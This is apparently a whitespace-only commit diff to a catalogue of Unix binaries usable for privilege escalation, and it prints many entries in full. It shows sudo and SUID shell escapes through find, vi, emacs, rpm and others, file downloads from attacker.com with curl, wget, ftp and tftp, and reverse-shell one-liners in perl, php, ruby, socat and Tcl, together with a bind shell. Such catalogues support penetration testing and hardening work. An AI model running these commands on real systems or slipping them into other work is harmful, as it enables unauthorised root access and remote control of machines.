Fix trailing spaces
Andrea Cardaci
parent
2b4fbed8a6
commit
f0d72ff530
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo ash
|
- code: sudo ash
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./ash
|
- code: ./ash
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo csh
|
- code: sudo csh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./csh -b
|
- code: ./csh -b
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -12,4 +12,4 @@ functions:
|
||||||
URL=http://attacker.com/file_to_get
|
URL=http://attacker.com/file_to_get
|
||||||
LFILE=where_to_save
|
LFILE=where_to_save
|
||||||
curl $URL -o $LFILE
|
curl $URL -o $LFILE
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo env /bin/sh
|
- code: sudo env /bin/sh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./env /bin/sh -p
|
- code: ./env /bin/sh -p
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo find . -exec /bin/sh \; -quit
|
- code: sudo find . -exec /bin/sh \; -quit
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./find . -exec /bin/sh -p \; -quit
|
- code: ./find . -exec /bin/sh -p \; -quit
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -20,4 +20,4 @@ functions:
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
ftp $RHOST
|
ftp $RHOST
|
||||||
get file_to_get
|
get file_to_get
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo ionice /bin/sh
|
- code: sudo ionice /bin/sh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./ionice /bin/sh -p
|
- code: ./ionice /bin/sh -p
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -12,4 +12,4 @@ functions:
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -35,6 +35,6 @@ functions:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -17,4 +17,4 @@ functions:
|
||||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||||
load-library:
|
load-library:
|
||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -4,11 +4,11 @@ functions:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||||
bind-shell:
|
bind-shell:
|
||||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo strace -o /dev/null /bin/sh
|
- code: sudo strace -o /dev/null /bin/sh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./strace -o /dev/null /bin/sh -p
|
- code: ./strace -o /dev/null /bin/sh -p
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo taskset 1 /bin/sh
|
- code: sudo taskset 1 /bin/sh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./taskset 1 /bin/sh -p
|
- code: ./taskset 1 /bin/sh -p
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -14,8 +14,8 @@ functions:
|
||||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -32,5 +32,5 @@ functions:
|
||||||
./telnet $RHOST $RPORT
|
./telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -12,4 +12,4 @@ functions:
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
tftp $RHOST
|
tftp $RHOST
|
||||||
get file_to_get
|
get file_to_get
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -10,4 +10,4 @@ functions:
|
||||||
- code: sudo vi -c ':!/bin/sh'
|
- code: sudo vi -c ':!/bin/sh'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./vi -c ':!/bin/sh -p'
|
- code: ./vi -c ':!/bin/sh -p'
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -12,4 +12,4 @@ functions:
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
wget $URL -O $LFILE
|
wget $URL -O $LFILE
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -10,8 +10,8 @@ functions:
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
||||||
---
|
---
|
||||||
|
|
|
||||||
|
|
@ -6,4 +6,4 @@ functions:
|
||||||
- code: sudo zsh
|
- code: sudo zsh
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./zsh
|
- code: ./zsh
|
||||||
---
|
---
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue